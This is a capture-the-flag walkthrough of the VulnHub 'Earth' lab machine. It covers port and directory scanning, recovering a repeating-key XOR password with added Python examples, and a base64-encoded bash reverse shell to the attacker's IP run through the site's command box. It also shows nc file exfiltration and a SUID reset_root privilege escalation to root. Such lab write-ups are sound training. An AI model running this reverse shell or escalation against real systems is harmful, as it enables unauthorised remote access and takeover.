Earth Box Notes
Overview
This is a VulnHub machine; it is mainly
Earth machine link: The Planets: Earth ~ VulnHub
I. nmap scanning
1. Port scan
-sT does a full TCP connect scan, --min-rate 10000 sends packets at a rate of no less than 10000 per second, -p- scans all 65535 ports, and -o ports writes the result to the file ports.
sudo nmap -sT --min-rate 10000 -p- -o ports 192.168.52.4
Nmap scan report for 192.168.52.4
Host is up (0.00042s latency).
Not shown: 65513 filtered tcp ports (no-response), 19 filtered tcp ports (host-unreach)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:5D:22:84 (VMware)
# Nmap done at Fri Nov 22 15:32:16 2024 -- 1 IP address (1 host up) scanned in 13.43 seconds
2. Detailed scan
-sT again for a TCP connect scan, -sV probes service versions, -sC runs the default script set against the ports found above ($ports, here 22, 80 and 443), -O fingerprints the operating system; the output goes to the details file.
sudo nmap -sT -sV -sC -p22,80,443 -O -o nmapscan/details 192.168.52.4
Result:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_ 256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after: 2031-10-10T23:26:31
|_http-title: Test Page for the HTTP Server on Fedora
| tls-alpn:
|_ http/1.1
MAC Address: 00:0C:29:5D:22:84 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.4
OS details: Linux 5.4
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 22 15:33:47 2024 -- 1 IP address (1 host up) scanned in 20.41 seconds
The TLS certificate reveals two hostnames for the target, earth.local and terratest.earth.local; we add both to the /etc/hosts file.
3. Script scan (vuln category)
nmap --script=vuln -p22,80,443 -o nmapscan/vuln 192.168.52.4
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
443/tcp open https
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
MAC Address: 00:0C:29:5D:22:84 (VMware)
# Nmap done at Fri Nov 22 15:34:49 2024 -- 1 IP address (1 host up) scanned in 42.87 seconds
II. Web penetration
The target has ports 80 and 443 open, so let's open them in a browser.
Port 80
Port 443
It is the web server's default page.
We also have the two hostnames to look at; both show the same content.
It looks like a message-feedback page, and below it there is a Previous Messages section. Those earlier messages appear to be encrypted, and decrypting them may well give us something interesting.
At this point we can brute-force directories to widen the attack surface.
sudo gobuster dir -u http://192.168.52.4 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
sudo gobuster dir -u https://192.168.52.4:443 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
sudo gobuster dir -u https://earth.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
sudo gobuster dir -u https://terratest.earth.local/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
You can also add -x zip,tar,txt and similar extensions to enlarge the wordlist and run a second pass.
Directory brute-forcing turns up an /admin page under https://earth.local.
It is a login page.
That is all we know so far; later on we also try a few likely paths such as /robots.txt.
Under terratest.earth.local we find /testingnotes.*; fuzzing the extension shows it is /testingnotes.txt.
It contains a note.
The key information:
XOR encryption is used
testdata.txt holds the encryption key
terra is the username
View the contents of testdata.txt:
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
We go to CyberChef to decrypt the message.
Decryption succeeds: the result is the string earthclimatechangebad4humans repeated over and over.
This should be the password; try it on the admin page.
Login succeeds, and we see a command-execution box.
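To make the decryption step reproducible without CyberChef, here is an added example (not code from the writeup or from the VulnHub author) of the repeating-key XOR scheme the testing notes describe. It assumes, as the writeup reports, that the message bytes are XORed with the text of testdata.txt as the key and that the hidden plaintext is the password repeated. The ciphertext it works on is built locally for the demo, not the string that was on the target, and the period check shows how a repeated value stands out in recovered plaintext.

```python
"""Repeating-key XOR as used by the Earth "Previous Messages" scheme.

Added example, not code from the original writeup. Assumptions: the message
is XORed byte for byte with the contents of testdata.txt as the key, and the
hidden plaintext is the admin password repeated, which is what the writeup
reports seeing in CyberChef. The ciphertext produced below is constructed
for the demo; it is not the string that was on the target.
"""
from itertools import cycle

# Key material exactly as the writeup quotes testdata.txt.
KEY_TEXT = (
    "According to radiometric dating estimation and other evidence, Earth "
    "formed over 4.5 billion years ago. Within the first billion years of "
    "Earth's history, life appeared in the oceans and began to affect Earth's "
    "atmosphere and surface, leading to the proliferation of anaerobic and, "
    "later, aerobic organisms. Some geological evidence indicates that life "
    "may have arisen as early as 4.1 billion years ago."
)
PASSWORD = "earthclimatechangebad4humans"  # the password the writeup recovered


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR data against key, cycling the key if data is longer.
    XOR is its own inverse, so the same call encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def build_demo_ciphertext(password: str = PASSWORD, key_text: str = KEY_TEXT) -> str:
    """Construct a ciphertext the way the challenge does: repeat the password
    out to the key length, XOR with the key, and return hex."""
    key = key_text.encode()
    plaintext = (password * (len(key) // len(password) + 1))[: len(key)].encode()
    return xor_with_key(plaintext, key).hex()


def decrypt_message(cipher_hex: str, key_text: str = KEY_TEXT) -> str:
    """Reverse the scheme given the key file (what CyberChef did in the writeup).
    With the key lying in the web root, every stored message is readable."""
    return xor_with_key(bytes.fromhex(cipher_hex), key_text.encode()).decode()


def smallest_period(text: str) -> int:
    """Shortest p such that text[i] == text[i+p] for every i.
    A short period in recovered plaintext is the tell that one value is
    being repeated, which is how the password stood out."""
    n = len(text)
    for p in range(1, n + 1):
        if all(text[i] == text[i + p] for i in range(n - p)):
            return p
    return n


def recover_repeated_secret(cipher_hex: str, key_text: str = KEY_TEXT) -> str:
    """Decrypt, then cut the plaintext at its period to get the repeated unit."""
    plain = decrypt_message(cipher_hex, key_text)
    return plain[: smallest_period(plain)]


if __name__ == "__main__":
    demo = build_demo_ciphertext()
    print("demo ciphertext (hex, first 64 chars):", demo[:64])
    print("repeated unit:", recover_repeated_secret(demo))
```

The lesson for whoever runs such a site is in decrypt_message: XOR with a static key is only as secret as the key file, and here the key was served from the same host as the ciphertext.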
III. Getting a foothold
Build a reverse-shell payload:
echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUyLjMvNDQ0NCAwPiYxJwo= | base64 -d | bash
Run it in the web page's command box.
Start a listener on the kali side:
sudo rlwrap -cAr nc -lvnp 4444
We get an initial shell.
In /var/earth_web we find the user flag.
IV. Privilege escalation to root
find / -perm -4000 -type f 2> /dev/null
There is a reset_root file, which looks interesting; let's run it.
It seems to fail.
Transfer it to kali with nc for local analysis.
On kali:
nc -lvp 4444 > reset_root
On the target:
cat /usr/bin/reset_root | nc 192.168.52.3 4444
The transfer completes.
chmod +x reset_root
Check the file type with file:
file reset_root
It is a Linux executable.
Use ltrace to look at its library calls:
ltrace ./reset_root
We see several files that do not exist: the program tries to access /dev/shm/kHgTFI5G, /dev/shm/Zw7bV9U5 and /tmp/kcM0Wewe, and each access fails (return value -1).
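The thing worth noticing in that trace is not just that the files are missing but where they live. As an added example (not from the writeup, and not a capture of the real binary) the script below parses ltrace-style lines and flags path checks that fall under world-writable directories; the sample trace lines are constructed to mirror the access() calls described above, with one extra path added to show the filter working. A SUID program whose behaviour is gated on files in /tmp or /dev/shm is gated on something any local user can create, which is exactly what this privilege escalation relies on.

```python
"""Reading an ltrace log for attacker-controllable file checks.

Added example, not part of the original writeup. The trace lines below are
constructed to look like ltrace's "func(args) = retval" output for the
access() calls the writeup describes; they are not a capture from the real
reset_root binary (the /etc/shadow line is a constructed contrast case).
"""
import re
from typing import List, NamedTuple

# Constructed sample, modelled on ltrace's output format.
SAMPLE_TRACE = """\
access("/dev/shm/kHgTFI5G", 0) = -1
access("/dev/shm/Zw7bV9U5", 0) = -1
access("/tmp/kcM0Wewe", 0) = -1
access("/etc/shadow", 0) = 0
puts("...") = 4
+++ exited (status 0) +++
"""

# Directories that are world-writable on a default Linux install.
WORLD_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Library calls whose first argument is a path.
FILE_CALLS = {"access", "open", "fopen", "stat", "lstat", "opendir"}

LINE_RE = re.compile(r'^(?P<func>\w+)\("(?P<path>[^"]*)"[^)]*\)\s*=\s*(?P<ret>-?\d+)')


class FileCall(NamedTuple):
    func: str
    path: str
    ret: int


def parse_file_calls(trace: str) -> List[FileCall]:
    """Extract (function, path, return value) for every path-taking call."""
    calls = []
    for line in trace.splitlines():
        m = LINE_RE.match(line)
        if m and m.group("func") in FILE_CALLS:
            calls.append(FileCall(m.group("func"), m.group("path"), int(m.group("ret"))))
    return calls


def failed_calls(calls: List[FileCall]) -> List[FileCall]:
    """The -1 returns: the missing files the writeup spotted in ltrace."""
    return [c for c in calls if c.ret < 0]


def attacker_controllable(calls: List[FileCall]) -> List[str]:
    """Paths checked under world-writable directories. A program, and a SUID
    one in particular, that changes behaviour based on these is trusting a
    location any unprivileged user can populate."""
    return sorted({c.path for c in calls if c.path.startswith(WORLD_WRITABLE_PREFIXES)})


if __name__ == "__main__":
    calls = parse_file_calls(SAMPLE_TRACE)
    for c in failed_calls(calls):
        print(f"missing: {c.path} ({c.func} returned {c.ret})")
    print("gated on world-writable paths:", attacker_controllable(calls))
```

When auditing a SUID binary on a host you defend, any hit from attacker_controllable is a finding on its own, regardless of whether the files currently exist.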
Create these files on the target:
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
Run it again:
reset_root
The root password has now been reset to Earth.
We have root.
Found the root flag.
One screenshot for the record:
[root@earth ~]# whoami
whoami
root
[root@earth ~]# uname -a
uname -a
Linux earth 5.14.9-200.fc34.x86_64 #1 SMP Thu Sep 30 11:55:35 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
[root@earth ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:5d:22:84 brd ff:ff:ff:ff:ff:ff
altname enp2s1
inet 192.168.52.4/24 brd 192.168.52.255 scope global dynamic noprefixroute ens33
valid_lft 1730sec preferred_lft 1730sec
inet6 fe80::f2c5:57e:d7af:5f01/64 scope link noprefixroute
valid_lft forever preferred_lft forever
[root@earth ~]# cat /var/earth_web/user_flag.txt
cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]
[root@earth ~]# cat root_flag.txt
cat root_flag.txt
_-o#&&*''''?d:>b\_
_o/"`'' '',, dMF9MMMMMHo_
.o&#' `"MbHMMMMMMMMMMMHo.
.o"" ' vodM*$&&HMMMMMMMMMM?.
,' $M&ood,~'`(&##MMMMMMH\
/ ,MMMMMMM#b?#bobMMMMHMMML
& ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
?$. :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
| |MMMMMMMMMMMMMMMMMMMMbMH' T,
$H#: `*MMMMMMMMMMMMMMMMMMMMb#}' `?
]MMH# ""*""""*#MMMMMMMMMMMMM' -
MMMMMb_ |MMMMMMMMMMMP' :
HMMMMMMMHo `MMMMMMMMMT .
?MMMMMMMMP 9MMMMMMMM} -
-?MMMMMMM |MMMMMMMMM?,d- '
:|MMMMMM- `MMMMMMMT .M|. :
.9MMM[ &MMMMM*' `' .
:9MMk `MMM#" -
&M} ` .-
`&. .
`~, . ./
. _ .-
'`--._,dd###pp=""'
Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
And with that, the machine is ours.
Finally